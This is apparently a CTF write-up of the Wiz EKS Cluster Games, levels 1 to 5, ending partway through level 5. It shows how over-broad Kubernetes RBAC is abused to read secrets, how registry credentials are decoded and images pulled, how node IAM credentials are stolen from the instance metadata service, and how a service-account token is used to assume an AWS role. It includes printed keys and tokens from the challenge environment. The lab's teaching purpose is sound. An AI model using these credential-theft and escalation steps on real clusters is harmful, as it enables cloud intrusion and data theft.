EKS Cluster Games

Last updated 1 year ago

This is a cloud security Capture The Flag (CTF) event organized by Wiz, with the goal of identifying and learning about common Amazon EKS security issues.

To learn more:


Level 1: Secret Seeker

Permission

{
    "secrets": [
        "get",
        "list"
    ]
}

Our service account permission

kubectl auth can-i --list

warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs                     Resource Names     Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []                 [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []                 [create]
secrets                                         []                                    []                 [get list]
                                                [/.well-known/openid-configuration]   []                 [get]
                                                [/api/*]                              []                 [get]
                                                [/api]                                []                 [get]
                                                [/apis/*]                             []                 [get]
                                                [/apis]                               []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/livez]                              []                 [get]
                                                [/livez]                              []                 [get]
                                                [/openapi/*]                          []                 [get]
                                                [/openapi]                            []                 [get]
                                                [/openid/v1/jwks]                     []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version]                            []                 [get]
                                                [/version]                            []                 [get]
podsecuritypolicies.policy                      []                                    [eks.privileged]   [use]

We can see that the service account has list and get permissions on secrets, so let's try listing them out.

kubectl get secrets -o yaml

apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
  kind: Secret
  metadata:
    creationTimestamp: "2023-11-01T13:02:08Z"
    name: log-rotate
    namespace: challenge1
    resourceVersion: "890951"
    uid: 03f6372c-b728-4c5b-ad28-70d5af8d387c
  type: Opaque
kind: List
metadata:
  resourceVersion: ""

We can see the flag in base64

root@wiz-eks-challenge:~# echo "d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ"| base64 -d
wiz_eks_challenge{omg_over_privileged_secret_access}base64: invalid input
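The `base64: invalid input` at the end is harmless: the trailing `==` padding was dropped when the string was copied. A small sketch that restores the padding before decoding:

```shell
s='d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ'
# base64 input must be a multiple of 4 characters; re-append the stripped '=' padding
while [ $(( ${#s} % 4 )) -ne 0 ]; do s="${s}="; done
echo "$s" | base64 -d
```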

Flag: wiz_eks_challenge{omg_over_privileged_secret_access}

Reference:


Level 2: Registry Hunt

Permissions

{
    "secrets": [
        "get"
    ],
    "pods": [
        "list",
        "get"
    ]
}

Listing the pods

kubectl get pods

NAME                    READY   STATUS    RESTARTS     AGE
database-pod-2c9b3a4e   1/1     Running   1 (9d ago)   45d
kubectl get pods database-pod-2c9b3a4e -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubernetes.io/psp: eks.privileged
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:32:05Z"
  name: database-pod-2c9b3a4e
  namespace: challenge2
  resourceVersion: "12166896"
  uid: 57fe7d43-5eb3-4554-98da-47340d94b4a6
spec:
  containers:
  - image: eksclustergames/base_ext_image
    imagePullPolicy: Always
    name: my-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-cq4m2
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  imagePullSecrets:
  - name: registry-pull-secrets-780bab1d
  nodeName: ip-192-168-21-50.us-west-1.compute.internal
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Always
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-cq4m2
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:05Z"
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:26Z"
    status: "True"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:26Z"
    status: "True"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:05Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: containerd://8010fe76a2bcad0d49b7d810efd7afdecdf00815a9f5197b651b26ddc5de1eb0
    image: docker.io/eksclustergames/base_ext_image:latest
    imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623
    lastState:
      terminated:
        containerID: containerd://b427307b7f428bcf6a50bb40ebef194ba358f77dbdb3e7025f46be02b922f5af
        exitCode: 0
        finishedAt: "2023-12-07T19:54:25Z"
        reason: Completed
        startedAt: "2023-11-01T13:32:08Z"
    name: my-container
    ready: true
    restartCount: 1
    started: true
    state:
      running:
        startedAt: "2023-12-07T19:54:26Z"
  hostIP: 192.168.21.50
  phase: Running
  podIP: 192.168.12.173
  podIPs:
  - ip: 192.168.12.173
  qosClass: BestEffort
  startTime: "2023-11-01T13:32:05Z"

We can see that the imagePullSecrets name is registry-pull-secrets-780bab1d.

Based on the Kubernetes documentation, we know that imagePullSecrets references a secret in the same namespace.

Listing out the secrets, we can retrieve the credentials for the private registry

kubectl get secret registry-pull-secrets-780bab1d -o yaml
apiVersion: v1
data:
  .dockerconfigjson: eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19
kind: Secret
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:31:29Z"
  name: registry-pull-secrets-780bab1d
  namespace: challenge2
  resourceVersion: "897340"
  uid: 1348531e-57ff-42df-b074-d9ecd566e18b
type: kubernetes.io/dockerconfigjson

Base64-decoding the .dockerconfigjson value gives us the authentication token, which can be further decoded into the registry credentials.

echo 'eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19' | base64 -d
{"auths": {"index.docker.io/v1/": {"auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="}}}

echo 'ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw==' | base64 -d
eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
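The whole decode chain can also be done in a single pipeline with jq (a sketch using the secret value from above; jq is already available in the challenge shell):

```shell
cfg='eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19'
# .dockerconfigjson -> auths map -> auth field -> user:token
echo "$cfg" | base64 -d | jq -r '.auths["index.docker.io/v1/"].auth' | base64 -d
```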

Since crane is pre-installed, we can use crane to authenticate and pull from the docker registry

crane auth login [OPTIONS] [SERVER] [flags]

  
  # Log in to reg.example.com
  crane auth login reg.example.com -u AzureDiamond -p hunter2

To log in to index.docker.io, we use the following command.

crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo

2023/12/17 03:58:28 logged in via /home/user/.docker/config.json

Reading the /home/user/.docker/config.json file shows that we have authenticated successfully.

cat /home/user/.docker/config.json
{
        "auths": {
                "https://index.docker.io/v1/": {
                        "auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="
                }
        }
}
crane ls index.docker.io/eksclustergames/base_ext_image --full-ref
index.docker.io/eksclustergames/base_ext_image:latest

crane pull index.docker.io/eksclustergames/base_ext_image:latest image.tar

Doing some manual enumeration allows us to retrieve the flag

tar xfv image.tar 
sha256:add093cd268deb7817aee1887b620628211a04e8733d22ab5c910f3b6cc91867
3f4d90098f5b5a6f6a76e9d217da85aa39b2081e30fa1f7d287138d6e7bf0ad7.tar.gz
193bf7018861e9ee50a4dc330ec5305abeade134d33d27a78ece55bf4c779e06.tar.gz
manifest.json

tar xfCv 193bf7018861e9ee50a4dc330ec5305abeade134d33d27a78ece55bf4c779e06.tar.gz stuff2
etc/
flag.txt
proc/
proc/.wh..wh..opq
sys/
sys/.wh..wh..opq

cat stuff2/flag.txt
wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}

We can also view the configuration of the image using crane config

crane config eksclustergames/base_ext_image:latest | jq

{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:18.920734382Z",
  "history": [
    {
      "created": "2023-07-18T23:19:33.538571854Z",
      "created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
    },
    {
      "created": "2023-07-18T23:19:33.655005962Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"sh\"]",
      "empty_layer": true
    },
    {
      "created": "2023-11-01T13:32:18.920734382Z",
      "created_by": "RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' > /flag.txt # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    {
      "created": "2023-11-01T13:32:18.920734382Z",
      "created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
      "comment": "buildkit.dockerfile.v0",
      "empty_layer": true
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
      "sha256:a70cef1cb742e242b33cc21f949af6dc7e59b6ea3ce595c61c179c3be0e5d432"
    ]
  }
}

Flag: wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}

Interestingly, this attack path is based on two real engagements on Alibaba Cloud and IBM Cloud, linked below.

Reference:


Level 3: Image Inquisition

Permission

{
    "pods": [
        "list",
        "get"
    ]
}

We perform the same pod enumeration, since we again have list and get permissions on pods.

kubectl get pods accounting-pod-876647f8 -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubernetes.io/psp: eks.privileged
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:32:10Z"
  name: accounting-pod-876647f8
  namespace: challenge3
  resourceVersion: "12166911"
  uid: dd2256ae-26ca-4b94-a4bf-4ac1768a54e2
spec:
  containers:
  - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
    imagePullPolicy: IfNotPresent
    name: accounting-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-mmvjj
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  nodeName: ip-192-168-21-50.us-west-1.compute.internal
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Always
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-mmvjj
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:10Z"
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:29Z"
    status: "True"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:29Z"
    status: "True"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:10Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: containerd://665178aaf28ddd6d73bf88958605be9851e03eed9c1e61f1a1176a69719191f2
    image: sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3
    imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
    lastState:
      terminated:
        containerID: containerd://c465d5104e6f4cac49da0b7495eb2f7c251770f8bf3ce4a1096cf5c704b9ebbe
        exitCode: 0
        finishedAt: "2023-12-07T19:54:28Z"
        reason: Completed
        startedAt: "2023-11-01T13:32:11Z"
    name: accounting-container
    ready: true
    restartCount: 1
    started: true
    state:
      running:
        startedAt: "2023-12-07T19:54:29Z"
  hostIP: 192.168.21.50
  phase: Running
  podIP: 192.168.5.251
  podIPs:
  - ip: 192.168.5.251
  qosClass: BestEffort
  startTime: "2023-11-01T13:32:10Z"

From the challenge description, we are running inside a compromised EKS pod, and from within the pod we can steal the node's credentials from the instance metadata service (IMDS).

curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole

{"AccessKeyId":"ASIA2AVYNEVM3TDX5VPA","Expiration":"2023-12-18 02:55:30+00:00","SecretAccessKey":"x8he/k4hZVf3XeC05+Zt3SE2js1l5SNlGeNv2c/G","SessionToken":"FwoGZXIvYXdzEEsaDJSwL+do/UMYss5O+SK3AW6TiFtiYLJj64aaDRckHW9q5CqfHpxSvN5Le4DVDkKzEpxfif0lNQ89i4GoKhabhvzatg/rv7YGx4oQUImNFGf/FPwPEb6hLdIsHO3i3hRAqSzoVOg5dzv6nXKkSlUogp0oeQlrqw6d7/q4wwjMKRQmDPvCkqr0tmtWRpwksYjeod4wus1HP3Pw8sJBEVrbDjfjvXtATw5lGm1G/wiCzMrDJPK+b67OWcmQH0Rd9sB8LHzm3R9qTCiSzf6rBjItdu1cltD7s6hdSUFvjoOWMV87m8mZ0NFaTKXZUwvSPY6eGddSjbh+Eo39gbn3"}

Next, we can log in using the aws configure command, then manually set the session token by modifying the .aws/credentials file.
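For reference, the resulting entry in ~/.aws/credentials looks like this (a sketch; the key values come from the IMDS response above and are long expired, and the session token placeholder is left for you to fill in):

```ini
# ~/.aws/credentials
[default]
aws_access_key_id     = ASIA2AVYNEVM3TDX5VPA
aws_secret_access_key = x8he/k4hZVf3XeC05+Zt3SE2js1l5SNlGeNv2c/G
aws_session_token     = <SessionToken value from the IMDS response>
```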

Next, we confirm the credentials are configured properly using aws sts get-caller-identity, then perform further enumeration.

Running aws ecr describe-repositories shows that there are two image repositories within the registry.

Running aws ecr get-authorization-token allows us to retrieve the authorization token needed to log in using crane.

Using the same command from level 2, I was able to log in successfully.

export password=$(aws ecr get-login-password)
crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS -p $password

We are able to retrieve the flag from the configuration file again.

crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container | jq

{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:07.782534085Z",
  "history": [
    {
      "created": "2023-07-18T23:19:33.538571854Z",
      "created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
    },
    {
      "created": "2023-07-18T23:19:33.655005962Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"sh\"]",
      "empty_layer": true
    },
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
      "comment": "buildkit.dockerfile.v0",
      "empty_layer": true
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
      "sha256:9057b2e37673dc3d5c78e0c3c5c39d5d0a4cf5b47663a4f50f5c6d56d8fd6ad5"
    ]
  }
}

Flag: wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future}

Reference:


Level 4: Pod Break

Permission

{}

Upon solving the level 3 challenge, we are told that the credentials will be available in the pod for ease of use. However, as I manually modified the .aws/credentials file previously, I needed to retrieve the credentials from IMDS again and re-configure with the level 4 credentials.

Note that the pod's service account has no permissions, so we will look at abusing the AWS permissions instead.

aws eks get-token --cluster-name eks-challenge-cluster
{
    "kind": "ExecCredential",
    "apiVersion": "client.authentication.k8s.io/v1beta1",
    "spec": {},
    "status": {
        "expirationTimestamp": "2023-12-24T16:11:30Z",
        "token": "k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vP0FjdGlvbj1HZXRDYWxsZXJJZGVudGl0eSZWZXJzaW9uPTIwMTEtMDYtMTUmWC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BU0lBMkFWWU5FVk02TlpRMkdFVSUyRjIwMjMxMjI0JTJGdXMtd2VzdC0xJTJGc3RzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyMzEyMjRUMTU1NzMwWiZYLUFtei1FeHBpcmVzPTYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCUzQngtazhzLWF3cy1pZCZYLUFtei1TZWN1cml0eS1Ub2tlbj1Gd29HWlhJdllYZHpFT24lMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkZ3RWFESDR3c3ZpTUY5MUtENHAlMkJuaUszQWJQaExkQ2JhJTJGJTJCaUozOXRpeXBjS09EZDZNSGx3Q1BsZG0lMkJLR3JRUGFpaG13ZkdrdGQ2S2gwOElKYjZVaGUxJTJGREZEZnlyODVBWnFBbXpYcHlvdEhtdXZKVDRnWWsydGZiQmxwdnJDa3FYVGlWeHZQbkdCYUhhSlVXRHZ4RE5BVnZqbGlPd1pSZ283UGhBQ3ZyOXR0JTJGTUpUNEFyZVY3d2tzR09jNk43cGppdEU1QWl0MEVJY2hwOCUyQmpyc1cySmZkaEtiRE9sNDQ0bGtZMDJLb2dhREpYeG1aWU9BVE1ncGRkMHl4UTBnbm1hTVhKU25FZXBiYSUyQmlqWm9xR3NCakl0N0lsMUFtSGNWZDlGcHhKWng1RGh1clpxcUR6WG9zeG8lMkZVRU1paHluQ0ZCdyUyQmFJZXBDZiUyRndlR1RadWIlMkYmWC1BbXotU2lnbmF0dXJlPTc2ZjNkYTI2MjA5Mzg3MDEwNzNjOWJhNmFhNTk4MmUzYmNkY2IxNzk1Y2RhYjhiNjRmMmMyZTMyNTU2ZWE2Nzg"
    }
}
TOKEN=$(aws eks get-token --cluster-name=eks-challenge-cluster | jq '.status.token' | sed "s/\"//g")

kubectl auth can-i --list --token=$TOKEN
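The sed quote-stripping above can be replaced by jq's -r flag. A self-contained sketch with a canned stand-in response (in the challenge, this JSON comes from aws eks get-token):

```shell
# Canned stand-in for the `aws eks get-token` JSON response
resp='{"kind":"ExecCredential","status":{"token":"k8s-aws-v1.example"}}'
# -r prints the raw string, so no sed is needed to strip the quotes
TOKEN=$(echo "$resp" | jq -r '.status.token')
echo "$TOKEN"
```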

We can then retrieve the flag from the secrets.

kubectl get secret --token=$TOKEN -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
  kind: Secret
  metadata:
    creationTimestamp: "2023-11-01T12:27:57Z"
    name: node-flag
    namespace: challenge4
    resourceVersion: "883574"
    uid: 26461a29-ec72-40e1-adc7-99128ce664f7
  type: Opaque
kind: List
metadata:
  resourceVersion: ""

echo "d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=" | base64 -d
wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}

Flag: wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}

Reference:

Level 5: Container Secrets Infrastructure

Based on the description, we will need to pivot from EKS to the AWS account and retrieve a flag from an AWS S3 bucket. First, let's take a look at the policy we have been given.

We run kubectl auth can-i --list to see the permission scope.

kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs   Resource Names     Verbs
serviceaccounts/token                           []                  [debug-sa]         [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []                 [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []                 [create]
pods                                            []                  []                 [get list]
secrets                                         []                  []                 [get list]
serviceaccounts                                 []                  []                 [get list]

We can see the user has permissions on pods, secrets and service accounts, so let's enumerate to find out more.

kubectl get secrets -o yaml
apiVersion: v1
items: []
kind: List
metadata:
  resourceVersion: ""
  
kubectl get pods -o yaml
apiVersion: v1
items: []
kind: List
metadata:
  resourceVersion: ""

kubectl get serviceaccounts -o yaml
apiVersion: v1
items:
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    annotations:
      description: This is a dummy service account with empty policy attached
      eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
    creationTimestamp: "2023-10-31T20:07:37Z"
    name: debug-sa
    namespace: challenge5
    resourceVersion: "671929"
    uid: 6cb6024a-c4da-47a9-9050-59c8c7079904
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    creationTimestamp: "2023-10-31T20:07:11Z"
    name: default
    namespace: challenge5
    resourceVersion: "671804"
    uid: 77bd3db6-3642-40d5-b8c1-14fa1b0cba8c
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    annotations:
      eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
    creationTimestamp: "2023-10-31T20:07:34Z"
    name: s3access-sa
    namespace: challenge5
    resourceVersion: "671916"
    uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda
kind: List
metadata:
  resourceVersion: ""

From the enumeration, we can see there are two service accounts, namely debug-sa and s3access-sa. Based on the permissions from kubectl auth can-i --list, we are able to create a service account token for the debug-sa account. Also note the IAM role ARN annotation assigned to both service accounts.

TOKEN=$(kubectl create token debug-sa)
kubectl auth can-i --list --token=$TOKEN

warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs                     Resource Names     Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []                 [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []                 [create]
                                                [/.well-known/openid-configuration]   []                 [get]
                                                [/api/*]                              []                 [get]
                                                [/api]                                []                 [get]
                                                [/apis/*]                             []                 [get]
                                                [/apis]                               []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/livez]                              []                 [get]
                                                [/livez]                              []                 [get]
                                                [/openapi/*]                          []                 [get]
                                                [/openapi]                            []                 [get]
                                                [/openid/v1/jwks]                     []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version]                            []                 [get]
                                                [/version]                            []                 [get]
podsecuritypolicies.policy                      []                                    [eks.privileged]   [use]

However, we have fewer permissions when using the debug service account token, which is in line with debug-sa's description as a dummy account.

The role's trust policy allows the sts:AssumeRoleWithWebIdentity action:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
                }
            }
        }
    ]
}
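The aud condition in this trust policy is why the token has to be minted with the audience sts.amazonaws.com. A token's claims can be sanity-checked by base64url-decoding its payload segment; a minimal sketch with a dummy token built in place (assumes jq, which the challenge shell provides):

```shell
# Build a dummy JWT-shaped token whose payload carries the expected audience claim
payload='{"aud":["sts.amazonaws.com"],"sub":"system:serviceaccount:challenge5:debug-sa"}'
jwt="header.$(echo -n "$payload" | base64 | tr -d '\n=' | tr '+/' '-_').signature"

# Extract the payload segment, undo the base64url alphabet, restore padding, read aud
seg=$(echo "$jwt" | cut -d. -f2 | tr '_-' '/+')
while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="${seg}="; done
echo "$seg" | base64 -d | jq -r '.aud[0]'
```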
TOKEN=$(kubectl create token debug-sa --audience sts.amazonaws.com)

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name something --web-identity-token $TOKEN

{
    "Credentials": {
        "AccessKeyId": "ASIA2AVYNEVM4L5OSGPW",
        "SecretAccessKey": "fiUdOL1u6kYo2qqwDiV5/99W1mbwZ/L0y+XdGJpI",
        "SessionToken": "IQoJb3JpZ2luX2VjEOz//////////wEaCXVzLXdlc3QtMSJIMEYCIQCk1qJGYAf5fic/6XZ08OeVmRPPnrfyftDQwH/mJE03kQIhAPhwKcHtbXSFambfgAIPGwSu+H+Ds6l7hCb1Bgt7jbJsKroECHUQABoMNjg4NjU1MjQ2NjgxIgw1sDbG9rHyXc/e3QoqlwRficlydMRZhiAt8DU4mBC3IXO87p3SqSCdzCs2qeic0A1Rx43+UN0IL0T0WiLpvHKo1+MCikStA0OuxGCuK+paBdmISQdw6XxxvMof+qzmyA/ntxajmkeYmAuqU2bx2jzHk8Q2wefD/1I+utp5BJLleGbVDxaO1kongQaLWjfFKwwJKdgos4PVey85BZoX24haobEcYSYfTZXtiuWpj3gU+Z+P4MA+c4aWsYZHxStE5XMGWf45Oki5gdsgiwznfvd+vBTWD8Zk17efJ0rGmADslPlfH0x29vqQgBSRg2+v1+JzXBehafZVgcobx910tNjy1EyKXuFIa4y2wtGPUNXrK8a9edoonePrqXQWJZzgphh8PXQsngGIbG1iTt4T78VzOYHWby9AyPpG5p/bVQ0l9ZAbag3rRYpBOyItWQvWRd2Jp+s3Zgv22Is8DZBOl7hUH5mshBQRWRjY9UUMeuSmWxyL617D3YaNmYRER6nn0EsLLd8LG863uLE5VYrGeuOSaZmvFIhmmxxLzyyr1uzngM3gr/LOt8ExKmHkQcAoDnX/JQts1Q9uuoNlc3Wr0OUZ18mWaVGg9RBHLc3uYbrk0CSZXItx7D/IJTiaJzZ/SHnFnw81AikUuk8e4cSGWhpagjIvqH9jS1NmMwuDHpcBs7sVO6qU5HQ5Oht75p3HOVq8Q0cvH/NPXW8iTN5NU9Zy9m5jJWZbMOrdpawGOpQBmiwUu2AW8lqnaI7sEGQvuUCJ/ACBRmEUj7j6rNMVVEH4S7kYOhcwbTLrHP4xoeFAk9hNHq29PIB3CHS0n7EOjkAgqwSFH7Bg2l3X+Z6JDOr07if0HeJPHkE1MwxILO03HooJHAiF7b/wBlMompCbZuf/po/e5lU2WL5pFcXO+GCAj3Qy6nlRR5RVx269ewK7qWefqQ==",
        "Expiration": "2023-12-25T13:00:42+00:00"
    },
